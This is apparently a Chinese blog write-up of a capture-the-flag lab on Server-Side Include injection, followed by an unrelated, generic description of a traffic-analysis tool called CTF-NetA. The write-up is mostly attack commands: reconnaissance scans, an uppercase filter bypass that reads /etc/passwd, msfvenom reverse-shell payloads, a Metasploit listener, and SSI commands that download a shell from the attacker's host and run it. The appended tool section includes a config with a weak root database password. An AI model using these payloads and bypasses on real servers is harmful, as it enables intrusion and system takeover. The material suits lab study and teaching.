CTF-SSI注入

6-4 CTF-SSI注入

登陆靶场地址如图
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
nmap -sV 192.168.176.135

nmap -A -v -T4 192.168.176.135
在这里插入图片描述

nikto -host http://192.168.176.135
在这里插入图片描述
dirb http://192.168.176.135
在这里插入图片描述
不允许我们查看robots
在这里插入图片描述
读取spucab目录
在这里插入图片描述
下载两个文件备用
查看ssi目录
在这里插入图片描述
得到信息,猜测可能存在命令注入
查看刚刚下载的两个文件
在这里插入图片描述

找到了站点的根目录
在这里插入图片描述
找到index页面得到信息
在这里插入图片描述
到达主页执行命令
在这里插入图片描述
submit后得到信息
在这里插入图片描述
发现exec被过滤
在第二个框中首先 将exec大写并加上!
在这里插入图片描述

得到重要信息

Dear, 192.168.176.128,
This receipt acknowledges the following information regarding your submission:

Date: Sunday 2nd of December 2018 05:43:15 AM
Target: --#exec cmd="cat /etc/passwd" --
Feedback: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false starfire:x:1000:1000:admin,,,:/home/starfire:/bin/bash guest-wpd40h:x:999:999:Guest:/tmp/guest-wpd40h:/bin/bash
Unique Token: 1151297382

Our team will get back to you with the next steps.
Thank you,
H.A.S.T.E.

在这里插入图片描述
制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击ip地址 lport=4444 -f raw > /root/Desktop/shell.php

192.168.176.128—攻击IP地址

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.176.128 lport=4444 -f raw > /root/Desktop/shell.py
在这里插入图片描述

启动监听
msfconsole

use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
show options
set lhost 192.168.176.128
run

通过ssi漏洞下载对应shell 执行 并 反弹shell
绕过过滤机制的方法:大小写绕过
将输入框改为

1
<!--#EXEC cmd="wget http://192.168.176.128/shell.py" -->

需要将shell移动到Apache根目录
在这里插入图片描述
使用 service apache2 start 启动服务 并查看是否为活动状态
在这里插入图片描述

submit 提交 下载shell
在这里插入图片描述
返回上一步 将权限设置为 777
及执行<!--#EXEC cmd="chmod 777 shell.py" -->
再使用 <!--#EXEC cmd="python shell.py" -->执行

已经反弹shell 成功
在这里插入图片描述
使用sysinfo
在这里插入图片描述
shell进入系统shell
并无管理员权限
在这里插入图片描述

优化终端python -c 'import pty;pty.spawn( "/bin/bash" )'

得到
在这里插入图片描述
一般CTF比赛中将flag中放在 /root/目录

在CTF比赛中SSI漏洞服务器有很多过滤机制,需要进行绕过,例如大小写绕过

### CTF-NetA 介绍 CTF-NetA 是一款专注于 CTF 比赛的网络流量分析工具,旨在为参赛者提供更高效的流量分析能力[^2]。与功能全面但操作复杂的 Wireshark 不同,CTF-NetA 更加聚焦于 CTF 场景下的特定需求,例如快速识别关键流量、提取敏感信息等。 ### 功能概述 CTF-NetA 的核心功能包括但不限于以下几点: - **流量捕获与过滤**:支持对指定网络接口进行实时流量捕获,并通过自定义规则对流量进行过滤[^2]。 - **数据包解析**:能够解析多种常见协议的数据包内容,帮助用户快速定位关键信息。 - **日志记录与分析**:通过配置文件中的 `[General]` 部分设置日志级别,记录分析过程中的重要事件[^2]。 - **数据库集成**:支持将解析结果存储到数据库中,便于后续查询和统计。数据库连接信息可以通过 `config.ini` 文件中的 `[Database]` 部分进行配置[^2]。 ### 使用方法 #### 1. 目录结构 CTF-NetA 的项目目录结构清晰明了,主要文件及其作用如下: - `LICENSE`:项目的许可证文件,明确了使用权限。 - `README.md`:项目的说明文档,提供了基本的使用指导。 - `main.py`:项目的启动文件,包含主逻辑和入口点。 - `config.ini`:项目的配置文件,用于调整运行环境和功能选项[^2]。 #### 2. 启动工具 要启动 CTF-NetA 工具,用户需要运行 `main.py` 文件。以下是启动代码示例: ```python import sys from core import CTFNetA def main(): ctf_neta = CTFNetA() ctf_neta.run() if __name__ == "__main__": main() ``` 在执行过程中,`CTFNetA` 类会根据 `config.ini` 中的配置加载必要的模块并开始运行[^2]。 #### 3. 配置文件 `config.ini` 文件是 CTF-NetA 的核心配置文件,用户可以根据实际需求修改其中的参数。以下是一个典型的配置示例: ```ini [General] log_level = INFO [Database] host = localhost port = 3306 user = root password = 123456 ``` - `[General]` 部分用于设置全局参数,如日志级别(`log_level`)。 - `[Database]` 部分用于配置数据库连接信息,包括主机地址、端口、用户名和密码。 ### 技术细节 CTF-NetA 的技术实现基于 Python 编程语言,利用了多种第三方库来完成流量捕获、解析和存储等功能。具体技术细节如下: - **流量捕获**:通过调用 `scapy` 或类似库实现对网络数据包的捕获。 - **数据包解析**:利用 `dpkt` 或其他解析库对捕获的数据包进行深度解析。 - **日志管理**:采用 Python 的标准日志模块 `logging`,支持多级日志输出。 - **数据库集成**:通过 `SQLAlchemy` 或原生 SQL 操作库与数据库交互,确保解析结果的持久化存储[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值